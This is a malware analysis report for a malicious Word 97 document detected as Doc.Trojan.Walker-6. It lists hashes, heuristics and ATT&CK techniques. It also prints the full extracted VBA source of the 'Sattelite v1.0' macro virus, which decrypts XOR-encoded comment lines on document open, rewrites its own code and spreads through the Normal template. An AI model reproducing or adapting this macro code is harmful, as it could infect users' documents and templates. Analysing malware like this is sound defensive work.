Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 210a03c24d628e63…

MALICIOUS

Office (OLE)

33.5 KB Created: 1998-11-15 16:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d5293882eaec17a551032dd7c22fd69c SHA-1: 2fa906f9caf314a8326c8360764f641c3d619089 SHA-256: 210a03c24d628e6347e2d4c55a4ca102b473a37c75b3316be2ad8a510d76cbbd
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute upon opening. The macro decrypts obfuscated code, which is then executed. This behavior is consistent with a downloader or droppper malware. The ClamAV detection of 'Doc.Trojan.Walker-6' further supports its malicious nature. The macro's comments indicate it is 'Sattelite v1.0'.

Heuristics 3

  • ClamAV: Doc.Trojan.Walker-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Walker-6
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11909 bytes
SHA-256: 269a902b2e2438eadb9180927d8041f212ef0ed9cea1fe43acb552f48e29fc94
Detection
ClamAV: Doc.Trojan.Walker-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True









































'Sattelite v1.0
'NormalTemplate
Private Function encr(s, k As Integer)
Dim r: r = "": For f = 1 To Len(s): r = r + Chr((Asc(Mid$(s, f, 1))) Xor k): Next: encr = r
End Function
Private Sub Document_Open()
On Error Resume Next: W = 0: CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH)
WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1)
If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Iam: .ReplaceLine 101, Kar: Z = .CountOfLines - 27: For X = 63 To Z:
If W = 20 Then W = 0
decrypt = .Lines(X, 1): W = W + 2: Y = Len(decrypt): Y = Y - 1: decrypt = Right$(decrypt, Y): .ReplaceLine X + 20, encr(decrypt, (W)): Next X: End With
Call ThisDoc: Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule: Flag = 0: GoTo Over
Again: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Flag = 1
Over:
With Iam: For X = 83 To 100: .ReplaceLine X, "'": Next X: End With
If Flag = 0 Then GoTo Again
End Sub
Private Sub ThisDoc()
'
'
'Ml"Gppmp"Pgqwog"Lgzv
'Etthmgepmkj*AjefhaGejgahOa}$9$s`Gejgah@mwefha`
'Ivroihu(PotsuVtirceroih&;&@gjuc
'Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m
'Yo~*Ki~Ikxxcox*7*Ki~c|oNei god~$\HZxe`oi~$\HIegzedod~y";#$IenoGen fo
'_ix,Bc~aOm~~ei~,1,Bc~am`Xia|`mxi"ZN\~cfiox"ZNOca|cbibx $=%"OchiAchy`i
'@G.3.@a|cobZkc~bozk XL^|adkmz XLMac~a`k`z}&?' MajkCaj{bk Bg`k}&:<".?'
'QY0-0QsdyfuT se}u~d>FR@b zusd>FRS }` ~u~dc8!9>S tu] te|u>\y~uc8$"<0!9
'[t2GQsaw:\[;2/205ASFFW^[FW2D#<"02Fzw|2\}` [|afs~~wv2/2F`gw2W~aw2\}` [|afs~~wv2/2Ts~aw
']r4AWugq<Z]=4(*463GU@@QX]@Q4B%:$64Uzp4Z{fyWuff}qf:W{az`[rX}zqg4*4$4@|qz4Ql}`4Gav
'Kd"WAcqg*CK+"?" %QCVVGNKVG"T3,2 "Vjgl"CavKlqvcnngf"?"Vpwg"Gnqg"CavKlqvcnngf"?"Dcnqg
'Mb$QGewa,EM-$8:$&#WEPPAHMPA$R5*4&$Ej`$EgpGevvmav*GkqjpKbHmjaw$:$4$Plaj$A|mp$Wqf
'O`&HitkOhurgjjcb&;&Rtsc&Ghb&GerOhurgjjcb&;&Rtsc&Rnch&C~or&Usd
'An(FgzeAf{|iddml(5(Nid{m(\`mf2([m|(Afnmk|agf(5(FgzeKizzamz2([m|(Kizzamz(5(Ik|Kizzamz2(Md{m2([m|(Afnmk|agf(5(Ik|Kizzamz2([m|(Kizzamz(5(FgzeKizzamz
']c~b*Ikxxcox0*\cxIeno*7*$Fcdoy";&*$Ie d~ElFcdoy#0*Odn*]c~b
'[exd,Ebjioxecb6,"Hi`ixi@ebi ,= ,"OcybxCj@ebi 6,"Eb i~x@ebi ,= ,Ze~Ochi
'Gh.@a|cG`}zobbkj.3.Hob}k.Zfk`. \k~bomkBg`k.:=".,)@a|cobZkc~bozk,.Kb}k. \k~bomkBg`k.:=".,)Jam{ck`z,
'U~t0Gydx
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'

End Sub
Private Sub Document_Close()
WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1): CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH)
If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule:
Kar2 = Iam.Lines(101, 1): Iam.ReplaceLine 101, "'": NormalTemplate.Save: If Kar = Kar2 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub


' Processing file: /opt/analyzer/scan_staging/54c5db613ac94a97a55f29c11a07502d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7670 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' Line #14:
' Line #15:
' Line #16:
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' Line #25:
' Line #26:
' Line #27:
' Line #28:
' Line #29:
' Line #30:
' Line #31:
' Line #32:
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' Line #37:
' Line #38:
' Line #39:
' Line #40:
' Line #41:
' 	QuoteRem 0x0000 0x000E "Sattelite v1.0"
' Line #42:
' 	QuoteRem 0x0000 0x000E "NormalTemplate"
' Line #
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.